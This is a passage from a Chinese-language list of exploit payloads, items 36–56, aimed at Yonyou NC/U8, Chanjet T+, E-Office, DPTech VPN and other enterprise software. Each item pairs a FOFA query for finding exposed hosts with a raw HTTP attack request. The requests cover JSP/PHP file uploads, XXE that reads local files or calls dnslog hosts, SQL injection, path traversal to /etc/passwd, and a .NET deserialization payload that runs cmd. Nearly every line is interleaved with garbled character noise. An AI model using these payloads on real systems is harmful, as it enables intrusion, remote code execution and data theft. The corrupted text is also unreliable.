3 {/ a* D) _; l3 i, NPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.18 ]6 U. B3 S8 E4 O
Host: 203.25.218.166:88886 t" F" r. ?' I, S
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
1 m7 Q4 f4 F3 D0 }7 p* Y+ sAccept-Encoding: gzip, deflate
, h) o" d! p1 L$ f; o" T( \Accept: */*
: g* \. P: f* f* H. A8 rConnection: close% f. _- {- n% K4 q$ L' t
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
+ H6 ^4 \- y8 i+ jContent-Length: 190& f& S1 S: ]! |1 R$ m9 W, ~( ^
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0! H# b+ R. h% E$ S. N" C6 W
3 `2 W2 s* y* p! n--fd28cb44e829ed1c197ec3bc71748df0
) F1 @9 A! e' c+ X& F1 j: c+ SContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
& U6 ~* k) I/ t" c5 t1 d% w
4 \# [- Z& L5 L3 F<%out.println(1111*1111);%>/ B; C/ C& M# j) @- l' z2 n. F
--fd28cb44e829ed1c197ec3bc71748df0--
' n* J# s4 D8 m
3 O# p g# ]; Z9 @1 H @( N9 i8 h; H1 b
36. 用友NC-Cloud soapFormat XXE$ X# B4 D: B$ l7 Q, z0 B: x2 f/ j
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"- s: l+ P& O' x
POST /uapws/soapFormat.ajax HTTP/1.1- R; r% T- E. {3 \) D4 _
Host: 192.168.40.130:8989
" I: g! E* F2 z! GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
5 A* q5 r, j' {5 cContent-Length: 2636 P4 o$ D: s, P! H \6 R) ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 L* i- g; O* B& k3 G- @Accept-Encoding: gzip, deflate
0 }& D4 Q) [+ N" I0 F( ?Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 _/ ^% T; G# P, s6 u9 u. e
Connection: close3 ?- _7 p6 @* n- c: }( e
Content-Type: application/x-www-form-urlencoded5 f0 }- O+ J; m0 y( V7 f
Upgrade-Insecure-Requests: 1! h. N1 a# Q; f3 Z0 I D( K
- l5 I% P' K, i: |5 T* x1 cmsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
6 R7 W" t j( I# P. t: p
6 Q9 H5 j& q5 p0 ?2 M# @2 r2 h. n! j. m6 O) ^9 v1 ?- n3 c
37. 用友NC-Cloud IUpdateService XXE
' ?: P% U$ k4 l/ [: OFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"7 K# {; M0 |8 U4 P0 c; Y% M
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1! I5 |$ t! `1 D' G/ \6 M% m
Host: 192.168.40.130:8989/ ~2 Y0 K; d0 k3 T* f9 R% g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
6 k1 g- i1 C8 q6 J7 \# T- P8 mContent-Length: 421
# [- [/ R7 J: kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: `# q: Y* @, A3 U4 E, w1 g$ o; v- s2 eAccept-Encoding: gzip, deflate4 I: \) e5 U% r/ w1 _3 V
Accept-Language: zh-CN,zh;q=0.9
7 ~$ O0 B2 A; _; b' P/ TConnection: close
2 N I# Y: Y4 z! RContent-Type: text/xml;charset=UTF-88 L: f; W: { V9 j% Z
SOAPAction: urn:getResult8 F/ J' e% {4 F) D; K
Upgrade-Insecure-Requests: 1' \, E' R1 G' F
: O8 F5 s4 h- m" b
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService"> f* I0 {3 Y- i' ^" U3 ^
<soapenv:Header/>
* n2 n/ G! z) U% p7 Y<soapenv:Body>
% Q( R. w, |$ B5 c2 ]! k7 O<iup:getResult>+ J; h8 t$ |2 {5 U& i
<!--type: string-->" B: `& }6 ^! H6 R, e0 P% N' N8 @; d
<iup:string><![CDATA[
" j+ T+ B% }, d<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>! ]0 c# h$ V7 r% Q
<xxx/>]]></iup:string>* G( |; D7 B( k: f4 g5 {) p( q
</iup:getResult>
6 F+ p/ n* Q: |" q) H1 U1 ]</soapenv:Body>) I% d* v) S( n d
</soapenv:Envelope>* H" `- i' F; X4 L+ J
& w4 T3 K8 E+ ^4 N( l4 d
; d9 F% U+ S, Z: r" @# C! n. n# c9 S" K$ @
38. 用友U8 Cloud smartweb2.RPC.d XXE) ]7 y1 F0 Z$ Q% ?8 g0 m# W$ W( Z
FOFA:app="用友-U8-Cloud"
# k* V9 _, e+ e9 ^- e: L5 B9 g$ aPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
" Y& a% R) k; gHost: 192.168.40.131:8088
8 d0 b; Z9 i8 Z, V; g, eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25; @. o- d: G+ X& I# @
Content-Length: 260
. Q7 }( L- X. B. a6 |$ I. J; _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
6 G2 e w9 r4 D: ?1 H9 XAccept-Encoding: gzip, deflate
+ n q9 f6 ]* N/ u% {3 W6 yAccept-Language: zh-CN,zh;q=0.9; F; B8 T( C5 \6 W- [
Connection: close
; N. x, V5 |4 s0 d" t v. b2 LContent-Type: application/x-www-form-urlencoded
7 `& k. r; s, Y9 {% J N2 z: p
. a1 d6 I. q0 R4 Z+ r__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
7 z" | M9 f2 I5 U, R3 l* i! G( z h" ]$ n# R# o2 H6 `
. E2 E: i$ E8 ?4 u9 I0 k39. 用友U8 Cloud RegisterServlet SQL注入2 S) c% e% D+ e v* d- {( S' b( t
FOFA:title="u8c"4 n7 Q- g+ z0 t
POST /servlet/RegisterServlet HTTP/1.13 B. f4 ]! k( W) [$ M- G
Host: 192.168.86.128:8089
2 l7 d5 `. f. g- ^' OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
& ~) U$ l2 ^7 U& `( }Connection: close- G' D& u2 {( J$ S7 i
Content-Length: 85& U% _1 d( o$ y
Accept: */*
8 v6 w+ t: X0 q9 s# b& U2 s/ ^Accept-Language: en
6 E0 _4 _6 m) uContent-Type: application/x-www-form-urlencoded
# w5 \+ A1 f1 _- B; d- D' NX-Forwarded-For: 127.0.0.1
& x2 |, D% e1 E9 T) o! P, p2 C& }Accept-Encoding: gzip: o4 O4 e1 k* e; S# D
% w) n& P: v1 q9 L# X" Nusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
$ v! T/ `7 V7 n4 j' D
, |2 r ?$ m2 m2 u, M u7 t
7 c; X. n- s3 y40. 用友U8-Cloud XChangeServlet XXE0 P# n$ q! `# ~# x- y) j
FOFA:app="用友-U8-Cloud"8 f/ q* x5 F! ^- ]' L% j
POST /service/XChangeServlet HTTP/1.17 F1 I }) p% x! M7 ]2 Z
Host: x.x.x.x3 A; z3 n+ n, A4 C* e" o
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 G$ u5 f7 E M6 JContent-Type: text/xml' l( W2 |* g4 ]0 G+ _0 C+ o! Q1 l
Connection: close
: P/ o8 o& A; o* `( t# c8 ]5 {& q$ W& c1 f1 M8 H
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>/ }' e/ S* z! u- V U; p% y
! T8 ~9 D3 i% ]9 i- n) x0 V4 M# i& q. v4 ] P
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入- N7 h$ o3 @/ v: m
FOFA:app="用友-U8-Cloud") g- R+ g* i/ ?. T' j
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.17 @/ F6 `( m. B: P. L! S
Host:
0 i$ p( v7 F$ ?9 G6 BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
1 h* h2 M* V& X; fContent-Type: application/json
/ E& u' A; f5 o1 \% Y7 }Accept-Encoding: gzip
9 R( E9 X9 m1 M* r1 kConnection: close
& h3 d1 h! q! i
2 {$ q1 U2 j( M1 R) |
- ~6 e3 x+ h" D, W# a0 D7 |. N42. 用友GRP-U8 SmartUpload01 文件上传! E+ _" e; m% j: |! Z) T( a
FOFA:app="用友-GRP-U8"
! ~) x0 b- n) U& x8 @% G |POST /u8qx/SmartUpload01.jsp HTTP/1.1
2 d; C0 t/ O$ O; rHost: x.x.x.x
/ S% Y) ]$ p! {! {Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
4 g# n/ _) Y TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36# i2 q$ ]4 ~, Z1 o. m+ ]2 s- p
( m+ h4 `/ [; e, J
PAYLOAD4 k3 C& F& W7 d5 W& S) a& f" j
& {) c; U1 i9 b+ V4 ?& M& q
. ~- |% x! o6 ` e- c( Uhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml1 P8 v) v7 r: f \) L$ R
/ j- m; V5 a+ Q% s
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 m3 m& W' w" R% K' f
FOFA:app="用友-GRP-U8"
/ F5 j7 S3 _) n4 [POST /services/userInfoWeb HTTP/1.1
" H3 K4 _; }+ ?6 f" WHost: your-ip. S% B! z5 b' `4 {- f" b) U
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
/ E! ~3 g, a& Q# DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: a( x+ d6 n& M. \* a* nAccept-Encoding: gzip, deflate/ V' e" Z5 b2 Z8 Z6 `: x
Accept-Language: zh-CN,zh;q=0.9- N( J3 b7 _# O4 U; @* e
Connection: close
& u: ?& {% F0 [: M+ F3 OSOAPAction:
* m4 u; ?+ K) Z5 @: y4 x- w' eContent-Type: text/xml;charset=UTF-80 _) o- Y$ J4 F% b0 @
8 b) s7 {3 [. i6 `; q<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">! x( p9 K& T/ r6 E% f: I
<soapenv:Header/>
0 M7 [1 _- c6 S* U <soapenv:Body>
, B3 `8 c# H$ H+ N$ F6 R# L <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">5 H( t- C) |& p+ ]# Y: q
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId> r! g' H; F( \. ~ p+ i+ Q7 G
</ser:getUserNameById>
: K$ [" @* k; K7 u& Y/ E0 Z+ e3 a </soapenv:Body>0 S. u% o% J- V
</soapenv:Envelope>: @- p2 N3 R" O# v# `( H
, p W0 ]/ r$ j) E8 H
- H5 x! U* `$ ^6 y% d) g; R44. 用友GRP-U8 bx_dj_check.jsp SQL注入
. S3 t4 K7 z1 X6 q( hFOFA:app="用友-GRP-U8"
: |4 [6 a; c( d' ^5 DGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.19 i7 l+ b# r. P0 U5 D
Host: your-ip+ _1 j6 T- r- N# @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
2 X. b/ ^/ B0 c6 p0 ]0 WAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.72 F2 l* a' t N0 N* D& _% a
Accept-Encoding: gzip, deflate4 `2 `" _1 x4 `1 _7 U
Accept-Language: zh-CN,zh;q=0.9
% B: a! c5 I+ Y6 }/ I. ^% cConnection: close
2 d! t9 t; y; N* z, L( u8 q+ ]) r! ^
. u* }4 l1 K% \, Z5 n+ V3 D, r m45. 用友GRP-U8 ufgovbank XXE
( O, I5 A! s. ?0 t- ]- nFOFA:app="用友-GRP-U8" N, p4 H' k3 i4 d
POST /ufgovbank HTTP/1.1
& [, {9 A( p& A5 [Host: 192.168.40.130:222& u6 Q$ N3 r$ C3 m# U3 p+ v8 B" W" L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0/ a" _+ y% v' I# n& H8 J, N% y
Connection: close
2 P+ n: G C% d( A+ ?0 ~$ V6 NContent-Length: 161; ?& h. l/ d, M: W$ |6 X- P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* w6 N* }; v. y5 `( IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 z6 E: u$ `5 s) BContent-Type: application/x-www-form-urlencoded8 j1 o3 B8 Z* X
Accept-Encoding: gzip
5 B$ k2 |% L! }$ M D& T, M8 U5 G* c# {2 y! [ Y7 T5 n
reqData=<?xml version="1.0"?>
- Z2 i) U/ y- J* t- ]<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest& U& r& y9 c* O9 B: T5 o
+ E4 j+ Q6 y: U7 f
% d" F; U) Q8 N/ l1 }
46. 用友GRP-U8 sqcxIndex.jsp SQL注入5 W7 L' A2 V" C. T' T5 a
FOFA:app="用友-GRP-U8"
4 f' M: M: ?+ L6 tGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1 t% F1 U. S* [2 L1 q* U3 T( m3 _
Host: your-ip4 W% q3 X+ d! x A
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.365 I8 o" ~1 G; d0 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ p5 Y3 B4 q/ v* C! a2 r7 l
Accept-Encoding: gzip, deflate
( p! }. C1 c" ~+ L# N1 ~# I2 \; [" bAccept-Language: zh-CN,zh;q=0.90 V& g/ t3 j3 Y# _; g4 w4 ], e; Y
Connection: close
9 H; d# U- x( w. D
! U. L, I! ]$ [2 }+ M& L# W
9 L [3 L# A' Q; |2 y+ F8 x/ w( e47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 R# L/ C8 X6 ]' h3 C3 YFOFA:body="/pf/portal/login/css/fonts/style.css"& B/ j; G/ u, Z8 Q; F) e
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1& w7 U2 F9 m3 {4 h$ p# D; \+ |/ F
Host: x.x.x.x1 v; |3 S# ?4 K. S' C* z0 u+ q$ P# e
Cache-Control: max-age=0+ [7 N: G2 Z5 F. j
Upgrade-Insecure-Requests: 1
) y. E' \4 b+ X7 K/ d1 ]6 C+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* n9 t ?. g! ?. D% }, kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
l1 `5 c* w! f# cAccept-Encoding: gzip, deflate, br5 S; o Q+ \1 h: T+ k5 q% E/ y
Accept-Language: zh-CN,zh;q=0.9. b6 [& Q$ V$ M& h' {
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT+ s6 p0 I" f# c+ w4 c
Connection: close
* P- _, O/ W0 S" Z# j* L( J# P* F* F7 M7 B. L
+ d0 W1 e; O, @' q; {
1 ^) N8 p& o; x4 a% e$ e9 Z, g4 F; E
48. 用友U8 CRM swfupload 任意文件上传/ Q+ F% r. M+ d0 G! g9 w
FOFA:title="用友U8CRM"
" V) N } f( y" M$ KPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
+ z3 G4 x J$ J2 ^) G4 O# lHost: your-ip
: N, Q" t! f; d" o, g9 D8 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 y V" @& o7 r: W( l4 c E! D! f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! q3 e$ \( i9 W# K5 H1 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2( I5 {3 x6 u; ?! h' L+ B
Accept-Encoding: gzip, deflate
7 o5 t# |1 [2 wContent-Type: multipart/form-data;boundary=----269520967239406871642430066855
8 M( ~2 P n! h7 N o, F------269520967239406871642430066855* R$ c; Q0 y! V1 v" G
Content-Disposition: form-data; name="file"; filename="s.php"
9 h1 q/ v) R2 t0 Y- }9 y8 C* u1231
) p( q1 z# P$ N& FContent-Type: application/octet-stream% _) s. t) P% S; b- P7 z
------269520967239406871642430066855
) f8 Y( Y) M- }/ f/ JContent-Disposition: form-data; name="upload"
4 f# r: [+ W( \8 L; zupload$ X& }% F/ D4 @4 d* h) H
------269520967239406871642430066855--
* u; o1 k% i7 U. k1 j5 }' r9 N
: B3 e3 E5 Z/ u: d5 x% x7 S4 F# n+ I" p! f: r, A8 @9 P" f6 A
49. 用友U8 CRM系统uploadfile.php接口任意文件上传9 U9 F! U' s0 t2 y) _- {- _
FOFA:body="用友U8CRM"9 \2 y; Y w; z# F, z9 ?, _. F
+ A9 F; V( K* N( C7 d. g
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
6 j6 B% K4 c5 ~- q0 qHost: x.x.x.x
2 q* Z" n: v/ t5 X0 OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.06 y+ D) g/ T, |# Y+ Z, A1 q$ `* r
Content-Length: 329( R2 \/ U# ?' l4 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! k6 J5 R- v; ^: G1 D3 h
Accept-Encoding: gzip, deflate
$ }0 V' b" U4 ^$ M. N& c; FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; \# o* J \9 MConnection: close
/ a! F, p6 M# \: UContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w2 J9 b) N+ {* d" A
1 Y# _3 Q! b4 c& x
-----------------------------vvv3wdayqv3yppdxvn3w5 u: @& ~# U3 G: W$ |' |
Content-Disposition: form-data; name="file"; filename="%s.php "6 t3 l5 S& V9 O4 \" S( c
Content-Type: application/octet-stream
% |7 F! g- k$ }, P2 }7 w, L0 }
% P1 o5 h6 N8 G5 cwersqqmlumloqa' W/ s; T' A1 j* Q8 [
-----------------------------vvv3wdayqv3yppdxvn3w$ N- N& e* e$ [6 U& @
Content-Disposition: form-data; name="upload"
, z, g8 H* ? M: h* G5 l9 U: O( c4 {$ i7 ^: g' u
upload
% P2 A ]: s% H( U. T' L-----------------------------vvv3wdayqv3yppdxvn3w--4 F4 b8 K. `5 g* p2 Q% _+ U% P8 \% i; E
1 n& G- |2 {4 r0 M. o" @
- _8 Z. g% ?# B/ V( K
http://x.x.x.x/tmpfile/updB3CB.tmp.php
( e% q3 O2 f$ L, b ^/ |, _
0 L8 l+ R$ J) s1 g, R8 x50. QDocs Smart School 6.4.1 filterRecords SQL注入
! U% X) j% q6 E# [FOFA:body="close closebtnmodal"7 { [+ y: x% o9 C
POST /course/filterRecords/ HTTP/1.18 j4 Q" e. W9 }# _* X" ]+ L
Host: x.x.x.x4 n3 H; ~6 t Z# o6 g
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36$ O4 J# s5 B* |$ ~/ S* Y
Connection: close' H! n% v% g1 ^# r
Content-Length: 224! n+ Y% Y' Z$ V" |/ h- j( i/ g7 U
Accept: */*
$ X, U9 ?: N* p9 [& NAccept-Language: en
4 I$ F$ c2 Y. @Content-Type: application/x-www-form-urlencoded m" C+ u J/ P! d1 d
Accept-Encoding: gzip0 F9 h" S3 [ J9 l( X
# O0 v. H9 b9 c! Y- o$ B$ j
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
& ]( l ?& k6 q; H4 x4 Z! e# N* g9 ]. z! S2 x4 x! m V
( H# m$ y; a" |6 I. z4 ~8 d51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
1 f; s( H' k! X; k* V8 k3 s( oFOFA:app="云时空社会化商业ERP系统"0 w. _: h v# z! |! h! r% w4 B1 B
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- U! o5 B4 q" c0 ^
Host: your-ip" `; E7 g& q5 O* P: a" `; z
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.364 H6 `4 ~1 O* R* P. t- V9 F$ G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: _) v, w+ ]5 Y
Accept-Encoding: gzip, deflate. D* U9 `" V1 p+ F0 {# M# U
Accept-Language: zh-CN,zh;q=0.9
}' C$ Z* Q6 p9 c- TConnection: close2 G! O3 @5 D+ n3 p, {; l9 C
! Q) G0 P2 k: m
& r7 b" k6 ?! N2 ^% k
52. 泛微E-Office json_common.php sql注入7 J, }. x# n n" u
FOFA:app="泛微-EOffice"9 ]2 q4 x, F4 F$ q, A
POST /building/json_common.php HTTP/1.1
' U" I V6 t: {: ?. i' [Host: 192.168.86.128:8097
/ c5 P" N: S% k$ `" y) F& bUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
# u3 R9 d) U( u0 hConnection: close& H2 K& }: \3 z+ ^5 S8 b
Content-Length: 87
$ }6 k7 M5 @% `$ }. g" K3 }0 CAccept: */** X% n3 T0 o8 ?3 P0 u( X6 D! b
Accept-Language: en
9 @. c O3 a! [Content-Type: application/x-www-form-urlencoded/ o/ @7 V1 Y7 [. [( d
Accept-Encoding: gzip# V7 V% A: ]4 Q# @
. c! ~3 \1 c$ ^1 l' A( T# Atfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333- K% G" E- w4 C8 L
& O4 I: q9 E9 @9 c4 E# v5 H
4 |5 P3 C7 ]* g) b0 R: L3 A% l53. 迪普 DPTech VPN Service 任意文件上传; Y- I( y$ G# B5 F/ d
FOFA:app="DPtech-SSLVPN"& M! u' @/ y/ N" n* P
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd7 D4 K; h* ]6 l# K! w
7 R! P. `/ U5 @# {1 U" y
. @* U7 s l, _9 B4 ^
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
: t' X3 E2 T! c$ iFOFA:app="畅捷通-TPlus"2 B9 ?( x& V" A% i$ L% {0 n6 i0 V
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
- A" I3 t8 E/ q"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
5 p2 A& [+ t, V- K$ \* @: I" P
^* v2 d) D9 d, {1 ]0 D. V) c9 u. @
完整数据包* }# w8 u0 G6 I# T {; J5 P
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
" r, p8 B$ s7 R, lHost: x.x.x.x/ t7 o5 I) K- B& \
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F1 O' ]$ |% N( a0 a
Content-Length: 593
8 ?( k9 p2 Z+ m0 j ^' u
2 n, Z f3 z7 V7 ^% D V{
. d; ?& L+ ?9 P% x4 V"storeID":{$ p- g0 f* u, W7 J
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",1 e7 O( W- M0 ^3 P" Q4 h1 _
"MethodName":"Start",
' N u% T4 t! h "ObjectInstance":{
' W& Q: S/ u" m; \ "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",9 ?+ G" b0 O9 J0 r, L
"StartInfo":{0 u, R4 Y" M+ G
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
. i( P# ^3 E% q# Z% g- q4 U6 P "FileName":"cmd",* r% B* u, D& r& D1 E* o
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
% A1 `% h: v: A6 N- n: S5 v: q }8 c6 t: S. O" c- {1 j
}* f- l0 G! H9 v* r' J X# H% \" ~
}3 k4 y/ i( P1 |
}; e/ J% |/ ]3 g5 x# D
- V4 ~: I0 v: c- @" [. W$ s- m) t
/ |# `5 z, B g; d第二步,访问如下url6 W6 E, B" P, ?
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
! t) v, E8 L' ^3 ?# ~9 ?* j0 [
" w9 G: y* t8 z6 x4 ^2 t, k
55. 畅捷通T+ getdecallusers信息泄露. ~& c# j+ r1 z* N
FOFA:app="畅捷通-TPlus"
U( d% q3 a" h7 k2 ^( [ R) }. z第一步,通过0 p% H. u8 @7 E7 \
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
1 m* P( t* s7 ^( r1 w2 u第二步,利用获取到的Cookie请求
/ h. g. ]) v* \( S3 {; ^/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers+ V2 c6 A% S8 d5 i; M4 P$ M- ^1 C
5 K+ R+ Y( i2 W% y* W7 k9 f56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE) j2 y2 G' T% Z s, r6 B
FOFA: app="畅捷通-TPlus"
/ L* V& c4 e' g; F3 r5 q1 `# qPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.15 H1 u) q1 i* [; A# U2 E+ Z0 I' C; j
Host: x.x.x.x
